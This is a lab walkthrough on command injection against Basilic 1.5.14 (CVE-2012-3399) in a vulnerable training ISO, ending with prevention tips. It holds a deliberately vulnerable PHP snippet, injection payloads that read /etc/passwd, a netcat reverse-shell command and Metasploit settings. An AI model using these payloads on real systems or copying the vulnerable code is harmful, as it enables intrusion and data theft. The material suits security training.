The Pentester Academy has just recently launched a Command Injection ISO virtual image of Ubuntu. This image has 10 real-world applications which have a vulnerable application framework. Remote code execution is possible by exploiting each of the installed application. It is important to note that this application is not running entirely on port 80.

Refer to the following links for related downloads and pertinent information:

https://www.vulnhub.com/entry/command-injection-iso-1,81/

http://www.pentesteracademy.com/course?id=12

What is Command Injection?

Command injection is an attack where the Cyberattacker tries to pass malicious payloads which are improperly handled by the application and then subsequently executed on the system shell. This vulnerability leads to remote code execution on the host machine where the vulnerable application resides on.

Command injection runs with the same privilege as that of the application. For example, if the vulnerable application is executed with the privilege of www-data, and if it is later exploited, then the Cyber attacker will get root privileges associated with the www-data.

The main reason for command injection vulnerability is the lack of input validation and system call or system methods that are used in the source code itself.

This is illustrated with a sample of vulnerable code for launching a command injection:

Create a file “test.txt” and write “Command injection test” in that file and save it as “read.php.”

<?php

print (“Command Injection testing”)

print(“<p>”);

$file=$_GET[‘fileread’];

system(“cat $file”);

?>

To read a file, we must send a “GET” request to the server with the parameter “fileread” in the URL as described below:

http://localhost/read.php?fileread=abc.txt

The output will be as follows:

Command Injection testing

Command injection text

To exploit the command injection vulnerability in the above code, we need to send the following request to the server:

http://localhost/read.php?fileread=abc.txt;id

The output will be:

Command Injection testing

Command injection text

Uid=33 (www-data) gid=33(www-data) groups=33(www-data)

The attacker then executes a command with the same privilege which is the same of the application which is currently running. This is how the command injection vulnerability is then executed.

There are other variants of executing “id” on the vulnerable application, and they are as follows:

http://localhost/read.php?fileread=abc.txt || id

http://localhost/read.php?fileread=abc.txt && id

If the installed application runs with root privilege, then the command injection can execute any command on the vulnerable host machine that the root user can execute.

Lab setup required for command injection pentest:

  1. Kali Linux (Bridged or NAT). Attacker Kali Linux IP is 192.168.1.102
  2. Command Injection ISO (Bridged or NAT). Target IP is 192.168.1.103

Understanding the look and feel of command injection ISO:

Command injection ISO provides us the facility to login into the OS and get a close look at the vulnerable application. To do this, log in to the command injection ISO with the username as “securitytube” and password as “123321”.

Checking out for port 80 on Command Injection ISO (192.168.1.103)

As seen above there are many frameworks installed for exploitation. We will be working with Basilic 1.5.14 in this article.

What is Basilic?

Basilic is a bibliography server that is used for research labs. It helps in the automation and diffusion of the research publication on the internet. It also generates a web page from the publication database. This framework helps with indexing, searching and various other options.

Basilic requires PHP, Apache, and MySQL for the proper installation and configuration.

To download, configure and install basilic click on the below link: http://artis.imag.fr/Software/Basilic/

Now click on the basilic folder, and you will see the following screen:

Searching for an exploit on the internet we will find CVE-2012-3399 which elaborates an improper input validation by Basilic on the following URL:

http://www.securityfocus.com/bid/54234/exploit

The exploit URL provides the vulnerable URL that leads to the Remote Code Execution.

The exploit helps to determine that the “diff.php” file is vulnerable to input handling and it is present in the /basilica/Config directory:

http://www.example.com/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2

Due to the output encoding of SecurityFocus, it seems to be obfuscated. An actual exploit can be seen at this link:

http://www.example.com/basilic/Config/diff.php?file=|cat /etc/passwd&new=1&old=2

Using the exploit mentioned above for command execution., the following screen thus appears:

We can execute a system command using a file parameter to get a reverse shell which is as follows:

Start a listener on Kali

root@kali#nc -lvvp 3333

Enter the command in file parameter as “diff.php?file=|nc -v 127.0.0.1 3333 -e /bin/bash&new=1&old=2”

Ethical Hacking Training – Resources (InfoSec)

Got the Shell.

The vulnerability of the Metasploit and Kali can now be exploited which is as follows:

Searching for an exploit in exploit-db with searchsploit tool in Kali Ruby exploit gives the following screen:


If the language is ruby, then it will also be present in Metasploit which can be described as follows:

Searching for an exploit in the MSF framework.

root@kali# service postgresql start

root@kali# service metasploit start

root@kali# msfconsole

msf> search basilic


The above screen shows an Arbitrary Command Execution exploit for Basilic.

Now, configure and run Metasploit as shown below:

Module options

RHOST 192.168.1.103

RPORT 80

TARGETURL /basilic-1.5.14/

Payload options

LHOST 192.168.1.102

LPORT 4444

Finally, Exploit.

We have thus successfully exploited a command injection vulnerability in basilic and got the www-data privilege on the target.

How to prevent command injection:

  1. The developer should implement proper input validation; special characters should not be used throughout the entire application.
  2. The system call function should not be used anywhere in the backend programming.
  3. The software application should run with least privilege.

References:

https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=26238

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3399

http://www.securityfocus.com/bid/54234

https://www.owasp.org/index.php/Command_Injection

https://www.google.com.sa/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwjjq7yQirzXAhWJWhoKHSSBBWwQFggmMAA&url=http%3A%2F%2Fartis.imag.fr%2FSoftware%2FBasilic%2F&usg=AOvVaw0NVD2PvLBYzJRZyqBV9gO6